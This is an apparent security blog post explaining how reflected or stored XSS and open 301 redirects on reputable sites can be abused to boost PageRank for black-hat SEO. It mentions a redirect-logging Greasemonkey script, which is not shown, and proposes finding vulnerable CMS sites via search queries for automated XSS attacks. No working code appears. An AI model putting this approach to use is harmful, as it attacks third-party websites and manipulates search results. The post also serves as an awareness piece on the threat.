It’s probably about time I’ve talked about how XSS works with SEO (search engine optimization). It’s probably one of the fastest growing reasons that people use both XSS and redirection attacks. Here’s the scenario. If you look at how Google pagerank works you can see that the more people who are linking to you the better (let’s remove the idea of spam domains for a second).
XSS allows you to put HTML content on a page, pure and simple. When GoogleBot surfs the internet it is attempting to find the number and quality of the links to your domain to calculate how relevant your content is. Each link is sort of the equivanant of a vote, and some votes are worth more than others depending on how high the website is that the link resides on.
There are two relevant attacks to this, one is reflected or stored XSS (DOM based doesn’t work, for this, sorry) and redirection attacks. If your link shows up on a very well respected domain it will show up higher in Google. So if you were to find a few hundred really well respected domains that had XSS issues, the only trick is to get them indexed and you have achieved much higher page rank. Redirection works the same way, depending on what type of redirection it uses. DOM based, again, doesn’t work for this, but if it does a simple 301 redirect (302 doesn’t help you since it isn’t considered permanant).
Now you take super motivated and pretty technically competant SEO Blackhat guys, who are already batteling it out with the likes of Matt Cutts (from Google) and Jeremy Zawodny (from Yahoo!) you have a pretty scary playing ground.
As a test, I threw together a very crappy little Greasemonkey script that logs for simple redirection attacks, since those are far more benign than XSS usually, and within a few minutes I was finding dozens of potential redirects. Getting those indexed would be fairly trival for anyone in the SEO industry. That could eventually lead the way for Google to have to modify their algorithm to ignore things like 301 redirects as a “vote” in the case where Google had never seen that particular URL before.
Here’s the crappy redirect detection Greasemonkey script. I don’t recommend using it, because it sucks, but it was a good proof of concept.
Here’s the super short redirect log of what I was able to add in just a few minutes of surfing around (yes, I was hitting a few of my girlfriend’s trashy gossip sites at the time for lack of better targets, sue me, I wasn’t feeling creative at the time). Most of them do not work, but the ones that do could potentially help page rank.
Now granted a good chunk of these do not work, but that actually shouldn’t matter much. Without even testing, sending multiple possible attempts to Google, even if 80% of them fail, it’s not like you are giving anything up, you are sending valid links that probably have some custom error logic. It just looks like you are linking to a lot of custom error pages, potentially. So pruning the redirect attack list may or may not help.
I did some tests in a prior verson that I had up and running about a year ago (before a machine I was using crashed and died) where I was doing some automated testing, by sending my browser to potentially thousands of URLs in just a few minutes and waiting for them to redirect back to my own custom domain with a particular URL parameter attached. That way I was able to detect what would work in a browser. That still wasn’t 100% predictive of what would and wouldn’t work because you are also getting a certain amount of DOM based reflection XSS and DOM based redirects in there, but it was an interesting test.
I’m really not interested in most forms of XSS for this test, but rather I am interested in redirects primarily, and not redirects that take post parameters to attack, but URL only. In this way it is easier to get Google to spider the domain with your custom URL. There are definitely more ways to attack this with stored XSS attacks, but those are more difficult to detect in automated tools.
Probably the most effective way of doing this would be to set up a Googlebot-like robot that scowered the page looking for your link in valid html syntax (not inside script tags). That level of parsing and the automated robot to set that up was beyond where I really wanted to go just to prove a point, but it’s definitely possible. For someone with more time on their hands, I could see this being a super powerful SEO tool.
As a side note, I was talking with quadzilla from SEO Blackhat (who, btw, is running a SEO blackjact tournament for anyone who is interested) and he gave me another idea regarding XSS detection that I have been thinking about for quite a while. One of the major problems on the internet today is the fact that a ton of websites are running canned software with bugs in it (drupal, PHP-Nuke, Wordpress ,etc…). If you subscribe to some of the webappsec mailing lists you probably can see the sheer volume of new XSS exploits being discovered on a daily basis. It’s fairly trivial to use Google to detect which websites are running the software in particular (by searching by keywords used by that software), and then use the returned lists of sites to launch automated XSS attacks, to improve pagerank. Pretty scary, and pretty easy.
I’ll write more on this later, but I wanted to get this one out of my brain.
Here are some links to SEO sites if you just want to familiarize yourself with the SEO domain:
- Shoemoney - Skills to Pay the Bills
- Jim Boykin’s Internet Marketing Blog
- Jeremy Zawodny’s Blog
- Matt Cutts: Gadgets, Google and SEO
- Daily SearchCast - Search Engine News Recap
- SEO Egghead
- Search Engine Watch
- SEO Blackhat: Blackhat SEO Blog
- A List Apart
- JenSense - Making sense of Contextual Advertizing
- Search Engine Blog.com
- Dave Naylor
- Secure SEO
- Black Hat Seo
- John Battelles Search Blog
- SEO by the Sea
- Greywolf’s SEO Blog
- SEO Roundtable
- I Love Google